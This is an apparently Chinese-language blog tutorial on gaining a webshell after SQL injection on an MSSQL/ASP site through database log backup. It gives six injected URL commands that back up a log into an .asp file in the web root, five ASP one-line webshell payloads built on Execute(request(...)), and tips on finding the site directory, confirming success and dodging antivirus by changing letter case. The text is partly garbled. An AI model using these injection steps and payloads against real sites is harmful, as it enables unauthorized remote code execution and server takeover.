当SQL注入是得到DB权限时候
接下来可以做
工作很多象找管理员密码后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲是log备份,LOG备份出来小马体积小,而且备份成功可性很大所以是我作为对DB权限第
种试探思路方法. 但是在LOG备份中,我们经常会遇到
些很让我们头痛问题,那就是闭合问题我在这里做个整理总结也 好让我们对不能闭合
思路方法有个全面了解. 1.先介绍下LOG备份
这个相信大家都很熟悉了我还是习惯在IE里直接提交返回正常页面就说这步操作就成功了如果没有返回正常页面我们就可以根据IE返回
来找他原因.(这里说下要将IE提示给打开),LOG格式如下所示: http://www.site.com/xx.asp?id=xxx;alter databas ... bsp;
RECOVERY FULL http://www.site.com/xx.asp?id=xxx;create& ... cmd (a image)--
http://www.site.com/xx.asp?id=xxx;backup log databasename ... bsp;’c:\cmd’ with init
http://www.site.com/xx.asp?id=xxx;insert
o cmd ( ... lt;%%25Execute(request("go"))% %25>’)--
http://www.site.com/xx.asp?id=xxx;backup log databasen ... ;= ’x:\xxx\xxx\asp1.asp’--
http://www.site.com/xx.asp?id=xxx;drop table cmd--
分为6步操作,最容易出错
就是第4步操作经常返回没有闭合问题下面就是些我们可以将 values中
内容可以进行更换方式,当我们种方式不行话就可以换另种方式当所有方式 都换完了
没有什么好说要么就放弃要么就换另种方式继续想列目录找数据库下载后台.这 里就不多说了
可以提换内容有: a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>
2.LOG备份要注意
些问题: a).要注意你现在
机器是不是WEB主机,简单思路方法就是翻他目录看有没有IIS安装文件 b).当你确定你要找
确实是WEN主机时就可以找他站点目录了,这个也很重要是步骤5操作如果备份到个目录当然就没有办法访问了 c).备份成功后
你就eBF梢允 4着用客户端去连接这个地方也有人弄错现在用字段是go,你客户端 相关字段也为go
d).用ececute正常备份出来
是用提示当你显示500时请你将IE提示打开当显示 Microsoft VBScript 运行时
’800a000d’ 类型不匹配: ’execute’
时候表示你已经成功了
连接吧!! e).还有极端
时候你备份出来句话被杀(当你确定你确实是备份在WEB主机对应目录是),你可以将 上面
VALUES字段中值做几个大小写转换般是没有问题.. 篇文章: alpha2 shellcode解密vbs脚本篇文章: 没有了
最新评论